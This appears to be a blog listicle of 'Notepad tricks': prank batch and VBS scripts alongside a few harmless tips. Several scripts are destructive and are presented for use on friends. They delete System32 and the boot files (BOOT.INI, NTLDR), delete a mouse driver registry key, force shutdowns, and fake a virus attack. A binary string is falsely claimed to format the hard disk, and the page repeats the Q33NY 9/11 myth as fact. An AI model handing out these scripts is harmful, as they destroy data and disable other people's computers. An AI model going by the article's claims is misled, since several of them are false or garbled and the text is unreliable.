Notepad is basically the simplest text editor provided by Microsoft in each and every version of Windows including its current Windows 10 avatar. In this article, we are going to talk about Notepad Tricks, Commands, and Hacks You Should Know. Let’s begin!
Notepad is actually the best option when you want to create a quick note. The files that are created by Notepad are saved in the .txt format that is supported by every text editor or document processor as well. So, the files that Notepad creates can be open, edit, and modify on almost every PC/laptop and even on your smartphone.
Folks take Notepad for a general note saver however, it is much beyond that. Notepad is also a light-weight text editor is wrong as it can open many unknown extensions files. And the Notepad itself allows you to execute unbelievable commands, tricks, and hacks in order to make it more productive for you.
You can do lots of things from Notepad Program such as creating programs, modify system files, hack hardware, create a virus, etc.. You can also give your computer the commands from the notepad program actually.
These Notepad Tricks basically works in all Windows versions such as Windows 7, Windows 8, and Windows 10.
Contents
- 1 Notepad Tricks, Commands, and Hacks You should Know
- 1.0.1 Notepad trick to Test Antivirus | Notepad Tricks
- 1.0.2 Make Notepad into your personal diary
- 1.0.3 Make A Personal Log-Book or A Diary | Notepad Tricks
- 1.0.4 Constantly Repeat Any Messages
- 1.0.5 Continually pop out CD Drive via Notepad | Notepad Tricks
- 1.0.6 Make your Notepad type real slow
- 1.0.7 Convey your friend a message and shut down his/her computer | Notepad Tricks
- 1.0.8 Matrix Effect
- 1.0.9 Format Hard Disk via Just Notepad | Notepad Tricks
- 1.0.10 Convert Text Into Audio via Notepad
- 1.0.11 Notepad Trick Print Tree Root | Notepad Tricks
- 1.0.12 Toggle Your Capslock
- 1.0.13 Fake Error Message | Notepad Tricks
- 1.1 LED Dance of Keyboard Using Notepad
- 1.1.1 Open Notepad Continuously | Notepad Tricks
- 1.1.2
- 1.1.3 World Trade Center Attack Trick
- 1.1.4 Create A Batch File Virus via Notepad | Notepad Tricks
- 1.1.5 Turn off Mouse Controls | Notepad Tricks
- 1.1.6 Change The Header And Footer In Notepad | Notepad Tricks
- 1.1.7 Hit Enter Continuously
- 1.1.8 Deleting Startup Files | Notepad Tricks
- 1.1.9 Hit Backspace Continuously
- 1.1.10 Remove System32 Files via Notepad | Notepad Tricks
- 1.1.11 Force windows to shut down
- 1.1.12 Type any sentence, again and again, | Notepad Tricks
- 1.1.13 Conclusion
Notepad Tricks, Commands, and Hacks You should Know
You guys will be having great fun. You guys just need is to copy the code from here and then paste in the notepad and save it along with an extension “.bat”. Just read out all of the tricks given below.
Notepad trick to Test Antivirus | Notepad Tricks
Through using this trick, you can easily test if your antivirus working perfectly or not.
X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*
Save it as test.exe and then run the file and check if your antivirus detects it then your antivirus is working perfectly or not. Otherwise, change your antivirus actually.
Make Notepad into your personal diary
Well, the title itself is really self-explanatory, follow the details in order to know how to use Notepad as your personal diary without even installing an additional tool. This trick basically allows you to get rid of a paid diary software.
Instructions:
- First, open Notepad
- Type .LOG and tap on the Enter button
- Save it with any name you like
- Then eopen
Now you have turned Notepad into your personal logbook or diary as well. Of course, the interface is not as good as a premium diary application, however, it’s okay to begin with, right?
Make A Personal Log-Book or A Diary | Notepad Tricks
Copy the below code and then paste it into notepad and save it as “log.txt”.
.LOG
Now every time you guys open this log file, you will have all the log details along with date and time.
Constantly Repeat Any Messages
This is actually one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and then paste in the notepad and store it as “message.bat”.
@ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN
Continually pop out CD Drive via Notepad | Notepad Tricks
This is one of my favorite tricks as this trick continually pop out the CD drive whenever you guys try to close it. Just copy the below code and then paste in the notepad and then store it as “cd.vbs”.
Set oWMP = CreateObject(“WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
Make your Notepad type real slow
We do not actually lack methods that you can use to annoy your friends. This is actually a trick to make notepad register typed texts slower than usual and keep your friends thinking what the hell is wrong. However, you can use this trick to convince your parents that your computer needs an upgrade actually ?
Notepad Tricks| Instructions:
- First, open Notepad
- Copy and paste the following codes in your notepad file
WScript.Sleep 180000 WScript.Sleep 10000 Set WshShell = WScript.CreateObject(“WScript.Shell”) WshShell.Run “notepad” WScript.Sleep 100 WshShell.AppActivate “Notepad” WScript.Sleep 500 WshShell.SendKeys “Hel” WScript.Sleep 500 WshShell.SendKeys “lo ” WScript.Sleep 500 WshShell.SendKeys “, ho” WScript.Sleep 500 WshShell.SendKeys “w a” WScript.Sleep 500 WshShell.SendKeys “re ” WScript.Sleep 500 WshShell.SendKeys “you” WScript.Sleep 500 WshShell.SendKeys “? ” WScript.Sleep 500 WshShell.SendKeys “I a” WScript.Sleep 500 WshShell.SendKeys “m g” WScript.Sleep 500 WshShell.SendKeys “ood” WScript.Sleep 500 WshShell.SendKeys ” th” WScript.Sleep 500 WshShell.SendKeys “ank” WScript.Sleep 500 WshShell.SendKeys “s! “
- Then save the file in .vbs format and close Notepad
What this code actually does is that it introduces a delay between the different strings that it types.
Convey your friend a message and shut down his/her computer | Notepad Tricks
You just have to copy the below code and paste into the notepad and save its as “anyname.bat”.
@echo off msg * Hey how are you shutdown -c “Error! You are really a stupid!” -s
Matrix Effect
This code will actually give you a matrix effect on your screen just copy the below code and then paste in notepad and also store it as “anyname.bat”.
@echo off color 02 : start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start
Format Hard Disk via Just Notepad | Notepad Tricks
This code will actually delete all your hard drive data. Just copy the below code and paste into notepad and store it as “anyname.exe”.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
Convert Text Into Audio via Notepad
This is a really cool notepad trick and this code will then convert your text into an audio file. Just copy the below code and then paste it into notepad and store it as “text-to-audio.vbs”
Dim message, sapi message=InputBox(“What do you want me to say?”,”Speak to Me”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message
Notepad Trick Print Tree Root | Notepad Tricks
This trick is actually one of the Best Notepad Trick that will print out a tree root on your screen. Just copy the below code, and paste it into notepad and then save it as teekids in C: windows system.
{print tree root} C:windowssystem {print C:windowssystemwinlog 4*43″$@[455] 3hr4~
Note: If you guys want to stop the “.vbs” files tap on ALT+CTRL+DEL on your keyboard and open task manager. And then process section and then stop the Wscript running file there.
Toggle Your Capslock
You can also toggle the Capslock key of your keyboard through just typing the code in the Notepad. Make sure to store the file as .vbs and open the saved file and see what happens when using Capslock Key.
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop
Fake Error Message | Notepad Tricks
Just simply open the notepad paste the code and save the file as error.vbs. Now when you will open the saved file you will then see an error message.
X=Msgbox(“Put your Message Here”,0+16,”Put Title Here”)
You can also replace and put your message here and put your title here along with your keywords.
LED Dance of Keyboard Using Notepad
Simply open Notepad and then enter the following code and store the file as “LEDDance.vbs”. When you open the saved file, you will also see all of the three LED lights of a keyboard will start to blink repeatedly.
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” wshshell.sendkeys “{SCROLLLOCK}” loop
Open Notepad Continuously | Notepad Tricks
This is actually the perfect prank to annoy your friend. You just need to copy and also paste the code inside the notepad and store it with any name along with the .bat extension. You can also send it to your friend and then make him or her click.
@ECHO OFF :TOP START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE GOTO TOP
World Trade Center Attack Trick
Well, the flight number of the airplane that had hit the World Trade center on 9/11 was Q33NY. Well, you might call this trick coincidence however, it will actually shock you.
- Open Notepad and type ‘Q33N’ without even the quotation mark in capital letters.
- Now increase the font size to 72 and then change the font to Wingdings.
You will be shocked to find out the visual graphics actually.
Create A Batch File Virus via Notepad | Notepad Tricks
This is the funniest and interesting Notepad plan actually. The best thing about this prank is that it actually looks like an actual virus attack. If you guys have a good antivirus then it detects this fake virus as a Trojan. You have to follow the steps below:
- Firstly, you have to open Run and type Notepad, and hit Enter. Notepad will appear as well.
- Now copy the below code and then paste it into Notepad.
cls :A color 0a cls @echo off echo Wscript.Sleep echo Wscript.Sleep 5000>C:sleep5000.vbs echo Wscript.Sleep 3000>C:sleep3000.vbs echo Wscript.Sleep 4000>C:sleep4000.vbs echo Wscript.Sleep 2000>C:sleep2000.vbs cd %systemroot%System32 dir cls start /w wscript.exe C:sleep3000.vbs echo Deleting Critical System Files… echo del *.* start /w wscript.exe C:sleep3000.vbs echo Deletion Successful! start /w wscript.exe C:sleep2000.vbs echo: echo: echo: echo Deleting Root Partition… start /w wscript.exe C:sleep2000.vbs echo del %SYSTEMROOT% start /w wscript.exe C:sleep4000.vbs echo Deletion Successful! start /w wscript.exe C:sleep2000.vbs echo: echo: echo: echo Creating Directory h4x… cd C:Documents and SettingsAll Users Start MenuPrograms mkdir h4x start /w wscript.exe C:sleep3000.vbs echo Directory Creation Successful! echo: echo: echo: echo Execution Attempt 1… start /w wscript.exe C:sleep3000.vbs echo cd C:Documents and SettingsAll Users Start MenuProgramsStartuph4x echo start hax.exe start /w wscript.exe C:sleep3000.vbs echo Virus Executed! echo: echo: echo: start /w wscript.exe C:sleep2000.vbs echo Disabling Windows Firewall… start /w wscript.exe C:sleep2000.vbs echo Killing all processes… start /w wscript.exe C:sleep2000.vbs echo Allowing virus to boot from startup… start /w wscript.exe C:sleep2000.vbs echo: echo: echo Virus has been executed successfully! start /w wscript.exe C:sleep2000.vbs echo: echo Have fun! start /w wscript.exe C:sleep2000.vbs pause shutdown -s -t 10 -c “Your computer has committed to death. Have a nice day.”
- Now you need to save the file with a .bat extension like virus.bat.
- Send the file to your friends and then tell them to run the file.
Turn off Mouse Controls | Notepad Tricks
Well, you should never try this on your pc, since this method turns off the mouse controls on your computer.
rem Disable Mouse set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass” reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4
Paste the above code in notepad and store it as disablemouse.bat on your computer as well.
Well, you just open the notepad and then browse to File>Page Setup in Notepad. And there in the fields for header and also footer type in the following codes actually.
&c Center the characters that follow &r Right-align the characters that follow &d Print the current date &t Print the current time &f Print the name of the document &p Print the page number &l Left-align the characters that follow
Hit Enter Continuously
This trick will let you use the function of the enter button in order to happen again and again. Well, you just need to copy and paste this code into the notepad:
Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop
Store the file as a .vbs file format in order to see the magic.
Deleting Startup Files | Notepad Tricks
Well, this is actually something that you should not try on your computer unless you are willing to lose all of your data. This code will delete the files that help your computer during the startup.
@ECHO OFF ATTRIB -R -S -H C:\AUTOEXEC.BAT DEL C:\AUTOEXEC.BAT ATTRIB -R -S -H C:\BOOT.INI DEL C:\BOOT.INI ATTRIB -R -S -H C:\NTLDR DEL C:\NTLDR ATTRIB -R -S -H C:\WINDOWS\WIN.INI DEL C:\WINDOWS\WIN.INI
You have to save the file as .bat file format. It will shut down your computer and will delete all of the important startup files. There’s no rollback option actually. Therefore you should be aware of what you will be doing. Please do not use the above-given code in order to harm anyone.
Hit Backspace Continuously
Well, this is one of the funniest things that you can do to annoy anyone. This trick will make hit backspace continuously also. You just have to copy and paste the code below in the notepad file:
MsgBox “Backspace again and again and AGAIN” Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop
You have to store the Notepad file in .vbs file format to make it work. In order to stop the script, you have to use the Task Manager on Windows.
Remove System32 Files via Notepad | Notepad Tricks
Well, this is actually another notepad trick to devastate a PC. This notepad trick will delete System32 files that lead to system failure. It’s not advisable to implement the trick, however, this code has the power in order to shut down any working computer within minutes.
DEL C:\WINDOWS\SYSTEM32\*.*/Q
However, make sure to store the notepad file in .bat file format.
Force windows to shut down
This is another notepad trick that will forcefully shut down your PC. You just need to enter the given code into the notepad and store it as .bat format. Let’s have a look at the code.
@echo off shutdown computer -c “sleep tight” -s
However, you have to make sure to save the notepad in .bat format
Type any sentence, again and again, | Notepad Tricks
Well, this is another fun notepad trick that you can use to pull on a prank on friends. This notepad trick will write anything again and again and again actually. Users need to manually close the process from the task manager in order to get out of the typing loop. Let’s see the code.
Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “I’ll be typed again and again” loop
However, you have to make sure you save the notepad file in .vbs file format.
Conclusion
Alright, That was all Folks! I hope you guys like this “Notepad Tricks” article and also find it helpful to you. Give us your feedback on it. Also if you guys have further queries and issues related to this article. Then let us know in the comments section below. We will get back to you shortly.
Have a Great Day!